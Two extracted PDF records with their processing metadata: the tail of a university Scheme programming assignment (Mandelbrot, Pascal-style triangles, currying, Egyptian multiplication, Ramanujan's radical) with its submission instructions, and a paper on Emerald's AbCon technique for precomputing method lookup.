with \(r\) and \(s\) both starting out at 0.0. While we can’t iterate forever to check for divergence, there is a simple condition which predicts divergence: if \(r \times r + s \times s > 4\) is ever true, either \(r\) or \(s\) will tend to diverge to infinity. Processing of a point continues until divergence is detected or until some threshold number of iterations has been reached. If the threshold is reached, the point is considered to be in the Mandelbrot set. Obviously, the higher the threshold, the higher the confidence that the point actually is in the set. The points not in the Mandelbrot set can be categorized as to their resistance to divergence. These points are often colorized, a point colored black if it is in the set, red if it is very resistant to divergence, blue if it immediately diverges, and somewhere in between red and blue for intermediate resistance.

Define a function, named `mandelbrot-iter`, that takes a threshold as its single argument, and returns another function that can be used to test whether or not a point is in the Mandelbrot set using the given threshold. The returned function takes two arguments, the x-coordinate and the y-coordinate of the point to be tested, and it returns the resistance (i.e., the number of iterations until the divergence test succeeds). The return value should be 0 if the point described by the x- and y-coordinates is in the Mandelbrot set (i.e., reaches the threshold). You should test for divergence before you test for reaching the threshold.

Example usage:

```scheme
(define mandelbrot-tester (mandelbrot-iter 100))
(if (= (mandelbrot-tester 2 3) 0)
    (print "point (2,3) is in the Mandelbrot set!\n")
    (print "point (2,3) is not in the Mandelbrot set.\n")
    )
```

In the above example, the threshold for determining whether or not a number is in the Mandelbrot set is 100.

4. Define a function named `root3` which uses a binary search algorithm to find the cube root of a given number. Your function should return the current approximation when the current approximation is indistinguishable from the previous approximation. Your function need only work for non-negative numbers.

5. Define a function, named `crazyTriangle`, that prints out \(n\) levels of Pascal’s triangle, but with a twist.
The leftmost and rightmost numbers at each level are not necessarily ones, as with Pascal’s triangle, but are given as the first and second arguments. The third argument is the number of levels to be printed. The output produced by `(crazyTriangle 1 1 6)` would be Pascal’s triangle:

```
      1
     1 1
    1 2 1
   1 3 3 1
  1 4 6 4 1
1 5 10 10 5 1
```

The output produced by `(crazyTriangle 1 2 6)` would be

```
      1
     1 2
    1 3 2
   1 4 5 2
  1 5 9 7 2
1 6 14 16 9 2
```

Note that the apex is always the first argument. Your function must print one level to a line with lower levels above upper levels. Your levels need to be centered around the apex (but don’t worry if the triangle skews rightward with multi-digit numbers). Your function must also minimize any redundant computations and should not overflow an integer while computing a triangle entry (unless the entry itself overflows).

6. Currying is the process of providing the arguments to a function at different points in time. The result of currying a function is a new function that accepts the last of the remaining, unspecified arguments. Define a function, named oppy, that curries a mathematical expression of two binary operators. As an example, these two expressions should evaluate to the same result:

        (+ x (* y z))

        ((((oppy +) x *) y) z)

Note that \(y\) and \(z\) could be instantiated far later than \(x\). Your implementation will only be tested on expressions of the form given above.

7. The function \(w\), described below, implements the Shanks transform:

\[
w(f, i) =
\begin{cases}
f(i) & \text{if } i = 0 \\[6pt]
\dfrac{S(f, i+1) \times S(f, i-1) - S(f, i)^2}{S(f, i+1) - 2 \times S(f, i) + S(f, i-1)} & \text{otherwise}
\end{cases}
\]

where the function \(S\) implements summation:

\[ S(f, n) = \sum_{i=0}^{n} f(i) \]

Implement \(w\) and \(S\) using an iterative process with no redundant computations.

8. The ancient Egyptians were perhaps the first people on earth to come up with the idea of binary arithmetic when they developed their method of multiplication. The Egyptian Multiplication method is a tabular calculation that lends itself to a straightforward computer implementation. The table starts out with a 1 in column \(a\), the multiplicand in column \(b\) and the multiplier in column \(c\). Columns \(a\) and \(c\) are successively doubled until the value in column \(a\) is greater than the value in column \(b\). For example, to multiply 1960 by 56, we generate the following table:

<table>
<thead>
<tr><th>a</th><th>b</th><th>c</th></tr>
</thead>
<tbody>
<tr><td>1</td><td>56</td><td>1960</td></tr>
<tr><td>2</td><td>56</td><td>3920</td></tr>
<tr><td>4</td><td>56</td><td>7840</td></tr>
<tr><td>8</td><td>56</td><td>15680</td></tr>
<tr><td>16</td><td>56</td><td>31360</td></tr>
<tr><td>32</td><td>56</td><td>62720</td></tr>
<tr><td>64</td><td>56</td><td>125440</td></tr>
</tbody>
</table>

At this point, we add a fourth column initialized to zero and apply the following algorithm. If the number in column \(a\) is less than or equal to that of column \(b\), we add column \(c\) to column \(d\) and subtract column \(a\) from column \(b\). Otherwise, we leave the values in \(b\) and \(d\) unchanged. In either case, we halve (integer division) the values in both columns \(a\) and \(c\). We stop when column \(b\) becomes zero. At this point, the answer resides in column \(d\).
<table>
<thead>
<tr><th>a</th><th>b</th><th>c</th><th>d</th></tr>
</thead>
<tbody>
<tr><td>64</td><td>56</td><td>125440</td><td>0</td></tr>
<tr><td>32</td><td>56</td><td>62720</td><td>0</td></tr>
<tr><td>16</td><td>24</td><td>31360</td><td>62720</td></tr>
<tr><td>8</td><td>8</td><td>15680</td><td>94080</td></tr>
<tr><td>4</td><td>0</td><td>7840</td><td>109760</td></tr>
</tbody>
</table>

Define a function named `egypt*` that takes two arguments, the multiplicand and the multiplier, and returns the product. Example calls:

    (egypt* 56 1960)   ; multiply 56 by 1960 (with no multiplication)
    (halve 56)         ; divide 56 by 2 (with no division)

Your method should implement an iterative process for both `egypt*` and `halve`. You may not use either multiplication or division in your solution. The `halve` function must run in sub-linear time.

9. Consider this infinite fraction:

\[ 1 + \frac{1}{1 + \frac{1}{2 + \frac{1}{1 + \frac{1}{2 + \cdots}}}} \]

Define a function called `mystery` that, when given an integer argument \(n\), computes the value of this equation to \(n\) terms. For example, if \(n\) is 0, the function should return 1. For \(n\) equal to 1, it should return \(1 + \frac{1}{1}\) or 2. For \(n\) equal to 2, it should return \(1 + \frac{1}{1 + \frac{1}{2}}\) or \(\frac{5}{3}\). The return value should be cast to a real number. Your function should compute its value using a recursive process. Your `run` function should give the value of the equation with an infinite number of terms.

10. The famous Indian mathematician, Ramanujan, asked a question that no one else seemed to be able to solve: what is the value of:

\[ \sqrt{1 + 2 \cdot \sqrt{1 + 3 \cdot \sqrt{1 + 4 \cdot \sqrt{1 + 5 \cdot \sqrt{1 + \cdots}}}}} \]

carried out to infinity? Instead of answering this question, Ramanujan gave a solution to the more general problem, the value of:

\[ \sqrt{1 + x \cdot \sqrt{1 + (x + 1) \cdot \sqrt{1 + (x + 2) \cdot \sqrt{1 + (x + 3) \cdot \sqrt{1 + \cdots}}}}} \]

carried out to infinity. Define a function, named `ramanujan`, which takes as its two arguments the depth of a rational approximation to the above nested expression (as before) and the value of \(x\). For example, if the depth is 0 and \(x\) is 3, `ramanujan` should return 0. If the depth is 1 and \(x\) is 3, `ramanujan` should return the value of \(\sqrt{1 + 3}\). If the depth is 2 and \(x\) is 3, the return value should be the value of \(\sqrt{1 + 3 \cdot \sqrt{1 + 4}}\). Your function should implement a recursive process. Define a second function, named `iramanujan`, with the same semantics but implementing an iterative process. Your `run` function should give the value of the above expression in terms of \(x\).

**Assignment submission**

The entire assignment should be contained in a single file named `assign1.scm`. Any explanatory text should be in the form of Scam comments, which begin with a semicolon. The file should load into the Scam interpreter cleanly. The last line of your file should be:

    (println "assignment 1 loaded!")

If you do not see the message "assignment 1 loaded" when executing your file with the Scam interpreter, then there is an error somewhere that needs to be fixed. If your file does not load properly (i.e. I do not see the message), you will receive no credit for your work.
To submit assignments, you need to install the *submit* system:

- linux and cygwin instructions
- mac instructions

Now delete extraneous files from your working directory. Finally, while in your working directory, type the command:

```
submit proglan lusth assign1
```

The *submit* program will bundle up all the files in your current directory and ship them to me. Thus it is very important that only the files related to the assignment are in your directory (you may submit test cases and test scripts). This includes subdirectories as well, since all the files in any subdirectories will also be shipped to me, so be careful. You may submit as many times as you want before the deadline; new submissions replace old submissions.
{"Source-Url": "http://beastie.cs.ua.edu/proglan/assign1.pdf", "len_cl100k_base": 4131, "olmocr-version": "0.1.49", "pdf-total-pages": 5, "total-fallback-pages": 0, "total-input-tokens": 14167, "total-output-tokens": 4426, "length": "2e12", "weborganizer": {"__label__adult": 0.0005254745483398438, "__label__art_design": 0.0007257461547851562, "__label__crime_law": 0.0006532669067382812, "__label__education_jobs": 0.03753662109375, "__label__entertainment": 0.00017654895782470703, "__label__fashion_beauty": 0.00025963783264160156, "__label__finance_business": 0.0003871917724609375, "__label__food_dining": 0.00101470947265625, "__label__games": 0.0015726089477539062, "__label__hardware": 0.00189208984375, "__label__health": 0.0006508827209472656, "__label__history": 0.0005631446838378906, "__label__home_hobbies": 0.0004243850708007813, "__label__industrial": 0.0008001327514648438, "__label__literature": 0.0007920265197753906, "__label__politics": 0.0004496574401855469, "__label__religion": 0.0008349418640136719, "__label__science_tech": 0.035186767578125, "__label__social_life": 0.0003771781921386719, "__label__software": 0.01136016845703125, "__label__software_dev": 0.90234375, "__label__sports_fitness": 0.0005335807800292969, "__label__transportation": 0.000675201416015625, "__label__travel": 0.0002846717834472656}, "weborganizer_max": "__label__software_dev", "avg_fraction_numbers_in_line_v1__avg_fraction_numbers_in_line_v1__avg_fraction_numbers_in_line_ratio": [[0, 14383, 0.08023]], "fineweb_edu_fasttext_gt2__fineweb_edu_fasttext_gt2__score": [[0, 14383, 0.54187]], "ft_lang_id_en_doc_v2__ft_lang_id_en_doc_v2__en": [[0, 14383, 0.85507]], "google_gemma-3-12b-it_contains_pii": [[0, 2327, false], [2327, 4551, null], [4551, 8035, null], [8035, 11045, null], [11045, 14383, null]], "google_gemma-3-12b-it_is_public_document": [[0, 2327, true], [2327, 4551, null], [4551, 8035, null], [8035, 11045, null], [11045, 14383, null]], "google_gemma-3-4b-it_v2tag__is_academic_paper": [[0, 5000, false], [5000, 14383, null]], "google_gemma-3-4b-it_v2tag__is_class_syllabus": [[0, 5000, false], [5000, 14383, null]], "google_gemma-3-4b-it_v2tag__is_completion_certificate": [[0, 5000, false], [5000, 14383, null]], "google_gemma-3-4b-it_v2tag__is_court_notice": [[0, 5000, false], [5000, 14383, null]], "google_gemma-3-4b-it_v2tag__is_homework_assignment": [[0, 5000, true], [5000, 14383, null]], "google_gemma-3-4b-it_v2tag__is_news_article": [[0, 5000, false], [5000, 14383, null]], "google_gemma-3-4b-it_v2tag__is_public_order": [[0, 5000, false], [5000, 14383, null]], "google_gemma-3-4b-it_v2tag__is_resume_cv": [[0, 5000, false], [5000, 14383, null]], "google_gemma-3-4b-it_v2tag__is_test_or_quiz": [[0, 5000, false], [5000, 14383, null]], "google_gemma-3-4b-it_v2tag__is_textbook": [[0, 5000, false], [5000, 14383, null]], "pdf_page_numbers": [[0, 2327, 1], [2327, 4551, 2], [4551, 8035, 3], [8035, 11045, 4], [11045, 14383, 5]], "pipe_delimited_lines_v1__pipe_delimited_lines_v1__pipe_delimited_lines_ratio": [[0, 14383, 0.08556]]}
olmocr_science_pdfs
2024-11-27
2024-11-27
9604957022e4d7c78827c3a2ea24960e96f57cee
Precomputing method lookup Jul, Eric Publication date: 2009 Document version Peer reviewed version Citation for published version (APA): Abstract. This paper looks at Method Lookup and discusses the Emerald approach to making Method Lookup more efficient by precomputing method lookup as early as possible — even moving it back into the compilation phase, if possible, thus eliminating method lookup entirely for many simple procedure calls. 1 Introduction 1.1 Original Motivation Smalltalk has been a very influential language. However, some of its features designed for flexibility, were also hard to implement efficiently. We believe that at least some of Smalltalk’s performance problems are caused by the absence of static typing: If only the compiler had more information available to it about the set of operations that can be invoked on an object, it could surely optimize the process of finding the right code, i.e., performing method lookup. This inspired the designers of the programming language Emerald [1] to design a mechanism for making Method Lookup more efficient. In the following, we describe this mechanism which was successful in eliminating most Method Lookup in Emerald. Subsequent advances such as inline caches have largely eliminated the “lookup penalty”. 1.2 Abstract and Concrete Types From our experience with Eden, we knew that a distributed system was never complete: it was always open to extension by new applications and new objects. Today, in the era of the Internet, the fact that the world is “under construction” has become a cliché, but in the early 1980s the idea that all systems should be extensible — we called it the “open world assumption” — was new. A consequence of this assumption is that an Emerald program needed to be able to operate on objects that do not exist at the time that the program was written, and, more significantly, on objects whose type is not known when the application was written. How could this be? Clearly, an application must have some expectations about the operations that could be invoked on a new object, otherwise the application could not hope to use the object at all. If an existing program P had minimal expectations of a newly injected object, such as requiring only that the new object accept the run invocation, many objects would satisfy those expectations. In contrast, if another program Q required that the new object understand a larger set of operations, such as redisplay, resize, move and iconify, fewer objects would be suitable. We derived most of Emerald’s type system from the open world assumption. We coined the term **concrete type** to describe the set of operations understood by an actual, concrete object, and the term **abstract type** to describe the declared type of a piece of programming language syntax, such as an expression or an identifier. The basic question that the type system attempted to answer was whether or not a given object (characterized by a concrete type) supported enough operations to be used in a particular context (characterized by an abstract type). Whenever an object was bound to an identifier, which could happen when any of the various forms of assignment or parameter binding were used, we required that the concrete type of the object **conform** to the abstract type declared for the identifier. 
In essence, conformity ensured that the concrete type was "bigger" than the abstract type, that is, the object understood a superset of the required operations, and that the types of the parameters and results of its operations also conformed appropriately. Basing Emerald's type system on conformity distinguished it from contemporary systems such as CLU, Russell, Modula-2, and Euclid, all of which required equality of types. It also distinguished Emerald's type system from systems in languages like Simula that were based on subclassing, that is, on the ancestry of the object's implementation. In a distributed system, the important questions are not about the implementation of an object (which is what the subclassing relation captures) but about the operations that it implements.

### 1.3 Type Checking and Binding of Types

Another consequence of the open world assumption was that sometimes type checking had to be performed at run time, for the very simple reason that neither the object to be invoked nor the code that created it existed until after the invoker was compiled. This requirement was familiar to us from our experience with the Eden Programming Language [2]. However, Eden used completely different type systems (and data models) for those objects that could be created dynamically and those that were known at compile time. For Emerald, we wanted to use a single consistent object model and type system. Herein lies an apparent contradiction. By definition, compile-time type checking is done at compile time, and an implementation of a typed language should be able to guarantee at compile time that no type errors will occur. However, there are situations where an application must insist on deferring type checking, typically because an object with which it wishes to communicate will not be available until run time. Our solution to this dilemma provided for the consistent application of conformity checking at either compile time or run time. If enough was known about an object at compile time to guarantee that its type conformed to that required by its context, the compiler certified the usage to be type-correct. If not enough was known, the type check was deferred to run time. In order to obtain useful diagnostics, we made the design decision that such a deferral would occur only if the programmer requested it explicitly, using the `view...as` primitive, which was partially inspired by qualification in Simula 67 [3,4]. Consider the example

```plaintext
var unknownFile: File
r ← (view unknownFile as Directory).Lookup("README")
```

Without the `view...as Directory` clause, the compiler would have indicated a type error, because `unknownFile`, as a `File`, would not understand the `Lookup` operation. With the clause, the compiler treated `unknownFile` as a `Directory` object, which would understand `Lookup`. In consequence, `view...as` required a dynamic check that the type of the object bound to `unknownFile` did indeed conform to `Directory`. Thus, successfully type-checking an Emerald program at compile time did not imply that no type errors would occur at run time; instead it guaranteed that any type errors that did occur at run time would do so at a place where the programmer had explicitly requested a dynamic type check. The `view...as` primitive later appeared in C++.
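To make the conformity check concrete, the sketch below models the dynamic test behind `view...as`. It is a minimal illustration in Python, not the Emerald run-time; the type representation and all names (`AbstractType`, `conforms`, `view_as`) are assumptions made for the example.

```python
# Minimal sketch (not the Emerald run-time) of the dynamic check behind
# `view ... as`: an object conforms to an abstract type if it understands
# at least the operations that the abstract type requires.  The type
# representation and all names here are illustrative assumptions.
from dataclasses import dataclass, field

@dataclass(frozen=True)
class AbstractType:
    name: str
    operations: frozenset        # names of the required operations

@dataclass
class Obj:
    concrete_type: str
    methods: dict = field(default_factory=dict)   # operation name -> callable

def conforms(obj: Obj, abstract: AbstractType) -> bool:
    """Structural check: the object's operation set is a superset of the
    operations required by the abstract type."""
    return abstract.operations.issubset(obj.methods)

def view_as(obj: Obj, abstract: AbstractType) -> Obj:
    """Model of `view obj as T`: fail at the point of the explicit request
    if the dynamic conformity check does not hold."""
    if not conforms(obj, abstract):
        raise TypeError(f"{obj.concrete_type} does not conform to {abstract.name}")
    return obj

Directory = AbstractType("Directory", frozenset({"Lookup", "Read", "Seek"}))
disk_dir = Obj("DiskDirectory", {"Lookup": lambda name: name, "Read": print, "Seek": print})
plain_file = Obj("DiskFile", {"Read": print, "Seek": print})

view_as(disk_dir, Directory).methods["Lookup"]("README")   # passes the check
# view_as(plain_file, Directory)                           # would raise TypeError
```

The essential point, and the contrast drawn next, is that the check is purely structural: it looks only at the operations the object actually has, not at any declared class or interface ancestry.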
Note that `view...as` is similar to casting in Java in that the interface view changes. However, in terms of type system and implementation, there is a substantial difference: Java does not check the types when casting but merely checks that the class of the cast object implements the specified interface (or an interface that inherits the specified interface). In Emerald, the `implements` relationship is not defined by a syntactic construct but rather implicitly by conformity: any object that has the operations specified by the interface (Abstract Type) implements the interface. Partially inspired by the `inspect` statement of Simula 67 [3,4], we also introduced a Boolean operator that returned the result of a type check. This allowed a programmer to check for conformity before attempting a `view...as`.

### 1.4 Operation Invocation

A performance problem plaguing object systems contemporary with Emerald, e.g., Smalltalk, was the cost of finding the code to execute when an operation was invoked on an object. This process was then generally known by the name "method lookup", and indeed it still is; in Emerald it is called operation invocation. In Smalltalk, method lookup involved searching method dictionaries starting at the class of the target object and continuing up the inheritance class hierarchy until the code was located. We thought that if Emerald didn't do static type checking, each operation invocation would require searching for an implementation of an operation with the correct name, which would be expensive — although, because we did not provide inheritance, not as expensive as in Smalltalk. In a language like Simula, in which each expression had a static type that uniquely identified its implementation, each legal message could be assigned a small integer and these integers could be used as indices into a table of pointers to the code of the various methods. In this way, Simula was able to use table lookup rather than search to find a method (and C++ still does so). We thought that static typing would give Emerald the same advantage, and this was one of the motivations for Emerald's static type system. However, even with static typing, there is still a problem in Emerald: except for the above-mentioned primitive types, knowing the type of an identifier at compile time tells us nothing about the implementation of the object to which it will be bound at run time. This is true even if the program submitted to the compiler contains only a single implementation that conforms to the declared type, because it is always possible for another implementation to arrive over the network from some other compiler. Thus, the Emerald implementation would still have to search for the appropriate method; the advantage that static typing would give us would be a guarantee that such a method existed.

### 1.5 More Efficient Method Lookup Using the AbCon Mechanism

The most dynamic form of method lookup is, for a given invocation, to search the concrete type for the operation that is to be invoked. Consider the example from above, extended with a further call:

```plaintext
var unknownFile: File
r ← (view unknownFile as Directory).Lookup("README")
result ← r.Lookup(something)
```

When invoking the method `Lookup` on the object assigned to `r`, the implementation can merely access the object, find its reference to its own concrete type, and then search the concrete type for the method. The Emerald implementation used several techniques to avoid this expensive dynamic search process.
First, it is often the case that dataflow analysis can be used to ascertain that an object has a specific concrete type, and the Emerald compiler used dataflow analysis quite extensively to avoid method lookup altogether by compiling a direct subroutine call to the appropriate method. Second, in those cases where dataflow analysis could not assign a unique concrete type to the target expression, we avoided the cost of searching for the correct method by inventing a data structure that took advantage of Emerald's abstract typing. This data structure was called an AbCon, because it mapped Abstract operations to Concrete implementations. AbCons are the responsibility of the run-time system: it constructs an AbCon for each ⟨type, implementation⟩ pair that it encounters. An object reference consists not of a single pointer, but of a pair of pointers: a pointer to the object itself, and a pointer to the appropriate AbCon, as shown in Figure 1. The AbCon is basically a vector containing pointers to some of the operations in the concrete representation of the object. The number and order of the operations in the vector are determined by the abstract type of the variable; operations on the object that are not in the variable's abstract type cannot be invoked, and so they do not need to be represented in the AbCon. In Figure 1, the abstract type `InputFile` supports just the two operations `Read` and `Seek`, so the vector is of size two, even though the concrete objects assigned to $f$ might support many more operations. An important point is that the size of the vector and the indexes into it can be determined at compile time. For example, using Figure 1, when calling `f.Seek`, the compiler knows the abstract type (`InputFile`), and can thus find the index of the `Seek` operation and generate an indirect jump via the AbCon vector. In situation (a) in Figure 1, the call would end up at `DiskFile.Seek`. Doing the method lookup with an AbCon is thus reduced to a load of the AbCon vector address, an indexing, and a load of the appropriate slot. AbCon vectors are, in principle, created upon assignment of a variable. In the example above, the view expression returns an object reference including a pointer to an appropriate AbCon, which is dynamically created, if necessary. It appears that we would have to generate new AbCons on every assignment, but in practice this is not the case. In a simple assignment between two variables of the same Abstract Type, the AbCon will be the same, as both the Abstract Type and the Concrete Type are the same. Thus the assignment is merely a copy of the two pointers; this covers many assignments. If the Abstract Types in an assignment differ, then a new AbCon needs to be generated. However, this only needs to be done once for each (Abstract Type, Concrete Type) pair. AbCons increased the cost of each assignment slightly, but made operation invocation as efficient as using a virtual function table. In practice it was almost never necessary to generate them during an assignment, because the number of different concrete types that an expression would take on was limited, often to one, or just a handful.
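The behaviour just described (an object reference carrying two pointers, a compile-time slot index, and rebinding that only swaps pointers) can be modelled in a few lines. The sketch below is an illustrative Python model with assumed names, not the Emerald run-time:

```python
# Minimal Python model of AbCon-based dispatch.  An object reference is a
# pair of pointers (object, AbCon); the AbCon is a dense vector of code
# pointers in the order fixed by the abstract type.

class DiskFile:
    def read(self, n):   return f"DiskFile.Read({n})"
    def seek(self, pos): return f"DiskFile.Seek({pos})"
    def delete(self):    return "DiskFile.Delete()"   # not part of InputFile

class InCoreFile:
    def read(self, n):   return f"InCoreFile.Read({n})"
    def seek(self, pos): return f"InCoreFile.Seek({pos})"

# The abstract type InputFile has two operations; their slot numbers are
# fixed at "compile time".
SLOT_READ, SLOT_SEEK = 0, 1

def build_abcon(concrete_class):
    """AbCon for the pair (InputFile, concrete_class): code pointers only."""
    return [concrete_class.read, concrete_class.seek]

class ObjectRef:
    """An object reference: a pointer to the object and one to its AbCon."""
    def __init__(self, obj, abcon):
        self.obj, self.abcon = obj, abcon

def invoke(ref, slot, *args):
    """The whole 'method lookup': load the AbCon, index the slot, jump."""
    return ref.abcon[slot](ref.obj, *args)

f = ObjectRef(DiskFile(), build_abcon(DiskFile))
print(invoke(f, SLOT_SEEK, 42))          # ends up at DiskFile.Seek

# Rebinding f to an InCoreFile, as in part (b) of Figure 1, only swaps the
# two pointers; the call site and the slot index are unchanged.
f = ObjectRef(InCoreFile(), build_abcon(InCoreFile))
print(invoke(f, SLOT_SEEK, 42))          # ends up at InCoreFile.Seek
```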
Many of the AbCons that the compiler can determine will be needed are generated at load time. If the compiler can deduce the concrete type of the assigned object, it merely inserts a store of the address of the relevant AbCon, and the AbCon address is patched into the code at load time. In this case, an assignment is a copy of the object pointer and a store of a constant address. Furthermore, in many cases the compiler could figure out, using data flow analysis, the single concrete type of an assigned object; the compiler was therefore able to generate a direct subroutine call to the concrete operation, or even in-line the operation, if it were small. In addition, if a variable can only hold references to one single concrete type, then the entire AbCon scheme can be elided. In such a case, the variable is implemented just like a pointer variable in C and the call is as efficient as a procedure call in C. In the case of an object of a new concrete type that arrives over the network at run time, it is necessary to generate a new AbCon dynamically, but this would typically occur in connection with the arrival of the object.

### 1.6 Indexing AbCons

The compiler uses the following scheme to index AbCons. First, each of the operation names is mapped to a unique id, which is fetched from a shared database. Second, the operations are sorted using their unique ids. Third, each operation is assigned a sequential index based on the sort. Thus the AbCon vector is dense and efficiently indexed by a small integer.

### 1.7 Single and Multiple Inheritance

Emerald does not have inheritance in the Smalltalk or C++ sense of the word. However, the AbCon mechanism is suitable for languages with traditional single or multiple inheritance: the AbCons are generated for each (interface, class) pair. Essentially, the method lookup is done at the time that the AbCon is generated rather than upon every call. Because the interface is fixed, a call can still be executed in constant time regardless of inheritance.

### 1.8 Caching AbCons

Each time an AbCon is to be generated, the run-time system first does a double-key hash lookup of the AbCon (using the unique ids of the Abstract Type and of the Concrete Type as a double key). If the AbCon already exists, the pointer to it is returned. If it does not, a new AbCon is generated for the pair and inserted into the hash table. Thus, except for the first time an AbCon is generated, the time to find an AbCon is constant (assuming that a suitable hashing algorithm is used). Any AbCon that the compiler can determine is needed is generated at load time, as the necessary information is present at that time.
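The double-keyed cache can be sketched in the same illustrative style; the memoisation below stands in for the run-time system's hash table and reuses the AbCon-vector representation from the dispatch sketch above. The function name and the choice of key are assumptions made for the example.

```python
# Sketch of the AbCon cache: AbCons are memoized on the double key
# (abstract type, concrete type), so each pair pays the construction
# cost at most once; later lookups are a single hash probe.

_abcon_cache = {}    # (abstract type name, concrete class) -> AbCon vector

def abcon_for(abstract_name, required_ops, concrete_class):
    """Return the AbCon for (abstract type, concrete type), building and
    caching it on first use."""
    key = (abstract_name, concrete_class)
    abcon = _abcon_cache.get(key)
    if abcon is None:
        # First encounter of this pair: do the operation search once, in
        # the dense order fixed by the abstract type, then cache the result.
        abcon = [getattr(concrete_class, op) for op in required_ops]
        _abcon_cache[key] = abcon
    return abcon

# Usage with the classes from the dispatch sketch above:
#   abcon_for("InputFile", ("read", "seek"), DiskFile)
# returns the same vector object on every call after the first.
```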
### 1.9 Performance Summary for AbCons

AbCons incur overhead as follows. On assignment: some assignments become a double pointer load and store instead of a single one. On method calls: in the worst case, the call can be performed using a load (of the AbCon vector), a load of the content of the indexed element, and a jump to it. For calls where the compiler can deduce the Concrete Type, the call is the same as a procedure call in C. The potentially most damaging overhead is the extra storage incurred by the AbCon pointers in those variables requiring them — their storage size is doubled. This can be significant for large arrays. However, in practice, it seems that most large arrays are not used for storing polymorphic data.

### 1.10 Comparison with Other Schemes

Compared to a contemporary language such as Smalltalk, method lookup in Emerald is much more efficient. Indeed, we achieved execution times comparable to those of similar C programs for a number of benchmarks [6]. Some years later, the Self project invented the Polymorphic Inline Cache [7], which is successful at eliminating message lookup for precisely the same reason that AbCons rarely need to be generated at assignment time: the number of concrete types that an expression can take on is usually small, and after the program has run for a while, the cache always hits. Alpern et al. [8] give an excellent overview of previous techniques for interface dispatch. They describe an itable, which is a virtual method table for a class, restricted to those methods that match a particular interface, i.e., essentially an AbCon, but searched by method rather than indexed by a precomputed slot number. The problem is that for a given method lookup, the implementation first must look up the appropriate itable that matches the interface in question, and thereafter search that itable for the method in question. Alpern et al. [8] propose a new interface dispatch mechanism, called the interface method table (IMT). They propose an IMT for each class. The IMT is essentially a hash table that contains the ids of interface methods and the methods' addresses. The IMT is populated dynamically as the virtual machine discovers that a class implements an interface; it then adds that interface's methods to the class's IMT. As long as there is no conflict, the call sequence can merely load the appropriate address right out of the IMT and jump to the method. Because the IMT is a hash table, there is the possibility of conflict. Such a conflict is detected when a new entry made in the IMT conflicts with a previous entry. In such a case, the virtual machine generates a conflict resolution stub that picks the correct interface method and jumps to the correct method in the appropriate class. This scheme thus tries to combine fast lookup with a reduced IMT size. However, compared to Emerald's AbCons, even the shortest sequence for interface dispatch contains an extra load (of the id of the interface method called). Moreover, AbCons are dense (because the compiler knows the interface) and therefore shorter than the IMT hash tables, and there is no possibility of conflict (because an AbCon is not a hash table). Zendra et al. [9] describe a different approach in which the tables are eliminated and replaced by simple static binary branching code derived using a type inference algorithm.

2 Summary

We have described the Emerald mechanism for precomputing method lookup to make method calls more efficient. The mechanism is made possible by a strong type system that requires a type for all expressions and variables. Method calls can, in general, be performed quite efficiently (using only two memory loads) in constant, low time. The cost is that some variables need to carry an extra pointer, which increases space overhead and increases the cost of assignment. In cases where the compiler can determine the concrete type of an object, the compiler can elide the extra overhead and call the operation directly; the extra overhead can also be avoided in those cases where the AbCon reference can be removed entirely. Parts of this paper have appeared in earlier Emerald articles [5,10].

References

Fig. 1: This figure, taken from reference [5], shows a variable $f$ of abstract type $InputFile$. At the top of the figure (part a), $f$ references an object of concrete type $DiskFile$, and $f$'s AbCon (called an Operation vector in the legend) is a two-element vector containing references to two $DiskFile$ methods.
At the bottom of the figure (part b), $f$ references an object of concrete type $InCoreFile$, and $f$'s AbCon has been changed to a two-element vector that references the correspondingly named methods of $InCoreFile$. (Figure ©1987 IEEE; reproduced by permission.)
{"Source-Url": "https://static-curis.ku.dk/portal/files/170214511/ICOOOLPS2008_paper09_Jul_final.pdf", "len_cl100k_base": 4239, "olmocr-version": "0.1.50", "pdf-total-pages": 10, "total-fallback-pages": 0, "total-input-tokens": 21883, "total-output-tokens": 5259, "length": "2e12", "weborganizer": {"__label__adult": 0.00035858154296875, "__label__art_design": 0.00022530555725097656, "__label__crime_law": 0.00026226043701171875, "__label__education_jobs": 0.00033473968505859375, "__label__entertainment": 4.8100948333740234e-05, "__label__fashion_beauty": 0.00013506412506103516, "__label__finance_business": 0.00014889240264892578, "__label__food_dining": 0.0003485679626464844, "__label__games": 0.00030517578125, "__label__hardware": 0.0006775856018066406, "__label__health": 0.0004055500030517578, "__label__history": 0.0001959800720214844, "__label__home_hobbies": 6.705522537231445e-05, "__label__industrial": 0.0002963542938232422, "__label__literature": 0.00022304058074951172, "__label__politics": 0.00023555755615234375, "__label__religion": 0.0004467964172363281, "__label__science_tech": 0.00540924072265625, "__label__social_life": 7.587671279907227e-05, "__label__software": 0.0034580230712890625, "__label__software_dev": 0.9853515625, "__label__sports_fitness": 0.00028705596923828125, "__label__transportation": 0.0004305839538574219, "__label__travel": 0.00020778179168701172}, "weborganizer_max": "__label__software_dev", "avg_fraction_numbers_in_line_v1__avg_fraction_numbers_in_line_v1__avg_fraction_numbers_in_line_ratio": [[0, 22799, 0.0313]], "fineweb_edu_fasttext_gt2__fineweb_edu_fasttext_gt2__score": [[0, 22799, 0.72988]], "ft_lang_id_en_doc_v2__ft_lang_id_en_doc_v2__en": [[0, 22799, 0.93387]], "google_gemma-3-12b-it_contains_pii": [[0, 423, false], [423, 2813, null], [2813, 6108, null], [6108, 9047, null], [9047, 12022, null], [12022, 15153, null], [15153, 17533, null], [17533, 20510, null], [20510, 22216, null], [22216, 22799, null]], "google_gemma-3-12b-it_is_public_document": [[0, 423, true], [423, 2813, null], [2813, 6108, null], [6108, 9047, null], [9047, 12022, null], [12022, 15153, null], [15153, 17533, null], [17533, 20510, null], [20510, 22216, null], [22216, 22799, null]], "google_gemma-3-4b-it_v2tag__is_academic_paper": [[0, 5000, true], [5000, 22799, null]], "google_gemma-3-4b-it_v2tag__is_class_syllabus": [[0, 5000, false], [5000, 22799, null]], "google_gemma-3-4b-it_v2tag__is_completion_certificate": [[0, 5000, false], [5000, 22799, null]], "google_gemma-3-4b-it_v2tag__is_court_notice": [[0, 5000, false], [5000, 22799, null]], "google_gemma-3-4b-it_v2tag__is_homework_assignment": [[0, 5000, false], [5000, 22799, null]], "google_gemma-3-4b-it_v2tag__is_news_article": [[0, 5000, false], [5000, 22799, null]], "google_gemma-3-4b-it_v2tag__is_public_order": [[0, 5000, false], [5000, 22799, null]], "google_gemma-3-4b-it_v2tag__is_resume_cv": [[0, 5000, false], [5000, 22799, null]], "google_gemma-3-4b-it_v2tag__is_test_or_quiz": [[0, 5000, false], [5000, 22799, null]], "google_gemma-3-4b-it_v2tag__is_textbook": [[0, 5000, false], [5000, 22799, null]], 